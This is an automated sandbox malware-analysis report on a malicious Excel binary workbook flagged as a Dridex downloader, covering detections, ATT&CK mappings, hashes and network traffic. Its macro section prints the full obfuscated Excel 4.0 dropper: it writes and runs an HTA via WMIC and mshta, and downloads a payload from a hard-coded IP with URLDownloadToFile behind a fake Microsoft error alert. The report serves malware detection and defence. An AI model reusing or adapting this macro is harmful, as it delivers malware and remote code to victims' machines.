Windows Analysis Report 03332955311591163552.xlsb
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Dropped Files |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DridexDownloader | Yara detected Dridex Downloader | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Sigma detected: Suspicious WMI Execution | Show sources |
Source: | Author: Michael Haag, Florian Roth, juju4, oscd.community: |
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | Window created: |
E-Banking Fraud: |
---|
Yara detected Dridex Downloader | Show sources |
Source: | File source: |
System Summary: |
---|
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found protected and hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Contains functionality to create processes via WMI | Show sources |
Source: | Binary or memory string: |
Found obfuscated Excel 4.0 Macro | Show sources |
Source: | Macro extractor: |
Source: | Macro extractor: |
Source: | Key opened: |
Source: | Virustotal: |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Source: | WMI Queries: |
Source: | Binary or memory string: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Persistence and Installation Behavior: |
---|
Creates processes via WMI | Show sources |
Source: | WMI Queries: |
Hooking and other Techniques for Hiding and Protection: |
---|
Creates and opens a fake document (probably a fake document to hide exploiting) | Show sources |
Source: | Process created: | ||
Source: | Process created: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: |
Source: | File source: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | ||
Source: | Queries volume information: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation21 | Path Interception | Process Injection2 | Masquerading1 | OS Credential Dumping | Virtualization/Sandbox Evasion1 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Non-Standard Port1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution31 | Logon Script (Windows) | Logon Script (Windows) | Process Injection2 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting3 | NTDS | System Information Discovery15 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
136.144.181.174 | unknown | Netherlands | 20857 | TRANSIP-ASAmsterdamtheNetherlandsNL | false |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 528334 |
Start date: | 25.11.2021 |
Start time: | 03:36:32 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 55s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 03332955311591163552.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal92.troj.expl.evad.winXLSB@4/4@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
03:37:38 | API Interceptor | |
03:37:39 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
136.144.181.174 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TRANSIP-ASAmsterdamtheNetherlandsNL | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4573 |
Entropy (8bit): | 5.072936336036304 |
Encrypted: | false |
SSDEEP: | 96:cngLVB369CTS6D5520yGJoyrlwSKzf0mZ:cgLVBQSSG520nmyBwE+ |
MD5: | C29745BC81C8ACDD29F72199EAE4C699 |
SHA1: | C5783C6B9E879661C5FECA9166CB62BDCA64E11E |
SHA-256: | 58AC14868565DB225586CF8DD6195CE82C70C247157667BB6CCCB15C3C263EC6 |
SHA-512: | AA7F57ADBE4D22AAC973AE08F90FAF1DC75324E7349EF4BE8B61E5FCFB0664101B415790291569D2FBF89AA4D54630214DA3B4D2672BE0F32D8C579A8927C2C0 |
Malicious: | true |
Yara Hits: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 47905 |
Entropy (8bit): | 7.975097307731708 |
Encrypted: | false |
SSDEEP: | 768:oPiBEX9M11Q3TUZg7EZ52/ViBN3SH8WsqnxyZI1FLyGuH32MRbYgB1ZQ0ZoKABAG:oPrX6Q3cWViBN3yKqxyeHw3vRMgF3oK+ |
MD5: | 3773A459C89CC2480156FE604D3C5A5D |
SHA1: | 3E2C5867A9670C6FDF65C156FDF6DE7F0A43A018 |
SHA-256: | 96E1EF7E454640575D72ED2B6C16843E44AEDF3BB6C47513DF78E4679CF4881F |
SHA-512: | 82383A4DF8ADF2A8521214993112D238BB72792BDB078B0BFE6CDD5CE16F5CA5305BB4ED162F0F0749C3A5EAB5CB929BD1E4B50360A02F13A58593514FAA51E7 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2847 |
Entropy (8bit): | 7.852890476604547 |
Encrypted: | false |
SSDEEP: | 48:tl8kRuafTq8urV1RN5YV9mk2atARitu9J3xIpuWOG0ghPgm2Gphq:bvYoTq8uh1RN6VwkDsiwzXWmgi2nq |
MD5: | 1C92712801D7A0424E86CB38324AE4C8 |
SHA1: | 1FF9A2E62CADB027F94FE03800C31AACC5EC64BA |
SHA-256: | D88437360CCAE5CA051E3A4818172246B142962A9A7372FBE45A22F4D646831D |
SHA-512: | 8AA6B872693687DF8191FA878440C711B6001259AAEBA13D4C82BFF418CCD37ACBF3621277D091CAD34DDC63EAC3F67156468AAA2BD32BE24520BAF337B03C20 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.880232506578822 |
TrID: |
|
File name: | 03332955311591163552.xlsb |
File size: | 79613 |
MD5: | 03b46f9c2c3a34b01d6c6653ae6058cf |
SHA1: | 151187d28d385e113a7af28b7174f7ab31e88c7c |
SHA256: | 0f42275a9cffd35cd5b51e5fae116431d8973ff94192ddd184f9cf1a10031ea0 |
SHA512: | c1ec925fcf177536d50785df2304df4fb6fdb2b49ce8e2254edaeca61d21128e3ebd485413be5ea0b053f18e21af56f83b240fc063529da42e3edc79ef37560e |
SSDEEP: | 1536:UW4PrX6Q3cWViBN3yKqxyeHw3vRMgF3oKy5h7aZkFOrRh7x8q+aNgdQ:VIqmc3/q0dfaguKymSOl0q9gdQ |
File Content Preview: | PK..........!...l.....W.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "03332955311591163552.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
0,564,=FOPEN("C:" & CHAR(92) & "Pro" & CHAR(103) & "ram" & CHAR(68) & "ata" & CHAR(92) & "" & CHAR(69) & "csbN" & CHAR(83) & CHAR(79) & "xkInoa" & CHAR(75) & ".rt" & CHAR(102), 3) 2,564,=C771+B3358 3,564,=C1372+B5815 4,564,=C3034+D5889 5,564,=B8734+D8279 6,564,=D1815+D9965 8,564,=B9542+D6767 9,564,=B5018+C9767 10,564,=A3001+B1175 14,564,=FOR.CELL("FaISTsVDGh",Sheet1!BZ159:CP427, TRUE) 17,564,=D6043+C4383 18,564,=D1988+A4014 21,564,=A9854+A2027 23,564,=A4466+A5233 27,564,=D3228+A9568 28,564,=FWRITE(0,CHAR(FaISTsVDGh)) 30,564,=B9417+D957 34,564,=D2736+A3735 36,564,=A7745+A4468 37,564,=A9577+A7603 41,564,=NEXT() 44,564,=D6203+D6704 48,564,=D271+A2464 49,564,=C862+B1433 51,564,=D8629+B2544 53,564,=EXEC("" & CHAR(119) & "mic p" & CHAR(114) & "ocess cal" & CHAR(108) & " creat" & CHAR(101) & CHAR(32) & "" & CHAR(34) & "" & CHAR(109) & CHAR(115) & "hta C" & CHAR(58) & "\ProgramData" & CHAR(92) & "EcsbNSOxkIn" & CHAR(111) & "aK.rt" & CHAR(102) & CHAR(34)) 54,564,=D7995+A4461 57,564,=B2564+D4980 58,564,=B424+D5690 59,564,=D3664+A8602 60,564,=D1224+A1591 63,564,=C8434+A2884 64,564,=B8882+B8994 65,564,=CALL("urlmo" & CHAR(110) & "", "URLDownloadT" & CHAR(111) & "Fi" & CHAR(108) & "" & CHAR(101) & CHAR(65),CHAR(74) & CHAR(74) & "CCJJ", 0, "http" & CHAR(58) & "//13" & CHAR(54) & CHAR(46) & "144.18" & CHAR(49) & CHAR(46) & CHAR(49) & "74:" & CHAR(56) & "080/Q2W5VWUF" & CHAR(76) & CHAR(53) & "" & CHAR(86) & "CMQ7JQPET" & CHAR(71) & "3CCTYX7" & CHAR(50) & "Z4" & CHAR(82) & "25PD" & CHAR(71), "C:" & CHAR(92) & "ProgramDa" & CHAR(116) & "a\" & CHAR(103) & CHAR(101) & "UjvKUyTJzj.tx" & CHAR(116),0,0) 67,564,=A2256+B4825 71,564,=D806+D8685 72,564,=C9749+A4044 73,564,=A7567+C5151 74,564,=D2929+C1646 75,564,=D520+B969 76,564,=D6921+D742 78,564,=C2007+B8208 79,564,=ALERT("Error! Sen" & CHAR(100) & CHAR(105) & "ng rep" & CHAR(111) & CHAR(114) & "t to " & CHAR(77) & CHAR(105) & "crosoft." & CHAR(46) & "" & CHAR(46) & "") 81,564,=B1267+D7232 82,564,=B229+A4473 84,564,=B8569+B9731 85,564,=A708+A80 87,564,=D5860+C7083 89,564,=D1262+A5225 91,564,=FOPEN("C:\Progra" & CHAR(109) & CHAR(68) & CHAR(97) & CHAR(116) & "a\geUjv" & CHAR(75) & "UyTJzj.tx" & CHAR(116) & "",1) 92,564,=D8060+A8468 98,564,=D9768+B411 99,564,=D6404+C4509 105,564,=SEND.MAIL(EVALUATE(FREAD(US92,255))) 107,564,=B3700+A4636 111,564,=A9666+A6358 115,564,=D9377+A7151 116,564,=RETURN()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 25, 2021 03:37:42.153620958 CET | 49167 | 8080 | 192.168.2.22 | 136.144.181.174 |
Nov 25, 2021 03:37:42.181308985 CET | 8080 | 49167 | 136.144.181.174 | 192.168.2.22 |
Nov 25, 2021 03:37:42.692008972 CET | 49167 | 8080 | 192.168.2.22 | 136.144.181.174 |
Nov 25, 2021 03:37:42.719654083 CET | 8080 | 49167 | 136.144.181.174 | 192.168.2.22 |
Nov 25, 2021 03:37:43.222310066 CET | 49167 | 8080 | 192.168.2.22 | 136.144.181.174 |
Nov 25, 2021 03:37:43.250269890 CET | 8080 | 49167 | 136.144.181.174 | 192.168.2.22 |
Nov 25, 2021 03:37:43.251727104 CET | 49168 | 8080 | 192.168.2.22 | 136.144.181.174 |
Nov 25, 2021 03:37:43.279582024 CET | 8080 | 49168 | 136.144.181.174 | 192.168.2.22 |
Nov 25, 2021 03:37:43.784055948 CET | 49168 | 8080 | 192.168.2.22 | 136.144.181.174 |
Nov 25, 2021 03:37:43.813091993 CET | 8080 | 49168 | 136.144.181.174 | 192.168.2.22 |
Nov 25, 2021 03:37:44.330049038 CET | 49168 | 8080 | 192.168.2.22 | 136.144.181.174 |
Nov 25, 2021 03:37:44.359146118 CET | 8080 | 49168 | 136.144.181.174 | 192.168.2.22 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 03:37:14 |
Start date: | 25/11/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f240000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 03:37:37 |
Start date: | 25/11/2021 |
Path: | C:\Windows\System32\wbem\WMIC.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffe50000 |
File size: | 566272 bytes |
MD5 hash: | FD902835DEAEF4091799287736F3A028 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 03:37:38 |
Start date: | 25/11/2021 |
Path: | C:\Windows\System32\mshta.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f5a0000 |
File size: | 13824 bytes |
MD5 hash: | 95828D670CFD3B16EE188168E083C3C5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|